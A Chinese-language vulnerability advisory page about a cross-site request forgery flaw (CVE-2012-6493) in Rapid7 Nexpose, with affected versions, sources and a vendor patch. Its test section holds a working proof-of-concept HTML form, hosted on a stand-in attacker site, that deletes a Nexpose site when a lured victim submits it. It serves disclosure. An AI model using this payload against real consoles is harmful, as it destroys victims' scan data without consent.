发布日期:2013-01-03
更新日期:2013-01-07受影响系统:
Rapid7 Nexpose < 5.5.3
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 57150
CVE(CAN) ID: CVE-2012-6493
Nexpose是一款漏洞管理软件。
Nexpose 5.5.4之前版本没有正确检查各个URL的refer域,远程攻击者若通过某种方式获得了合法用户的cookie,那么便可以以合法用户的身份执行删除扫描数据和站点等操作。
<*来源:Robert Gilbert
链接:http://seclists.org/bugtraq/2013/Jan/13
https://community.rapid7.com/docs/DOC-2065#release5
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Exploit steps for proof-of-concept:
1. Create an external site/page: http://attackersite.com/nexpose-csrf.htm that contains:
[code]
<html>
<!-- Nexpose CSRF PoC -->
<body>
<form action="https://nexpose-security-console-site:3780/data/site/delete?siteid=1"; method="POST" enctype="multipart/form-data">
<input type="submit" value="delete site" />
</form>
<script>
//document.forms[0].submit(); //uncomment to auto-submit
</script>
</body>
</html>
[/code]
2. Lure victim to http://attackersite.com/nexpose-csrf.htm.
3. Site with ID 1 is deleted when form is submitted.建议:
--------------------------------------------------------------------------------
厂商补丁:
Rapid7
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
https://community.rapid7.com/docs/DOC-2065#release5Centrify Deployment Manager任意文件覆盖漏洞e107 "e107_admin/download.php"跨站请求伪造漏洞相关资讯 Nexpose安全漏洞 本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|